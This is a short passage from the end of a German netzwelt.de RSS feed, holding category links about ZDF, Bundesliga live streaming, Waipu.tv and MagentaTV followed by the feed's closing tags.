																	<a href="https://www.netzwelt.de/tv-sender/zdf.html">ZDF</a>,																	<a href="https://www.netzwelt.de/fussball-internet/index.html">Bundesliga-Live-Stream: Fußball im Internet schauen</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/waipu-index.html">Waipu.tv</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/magentatv-index.html">MagentaTV</a>.]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,45ms -->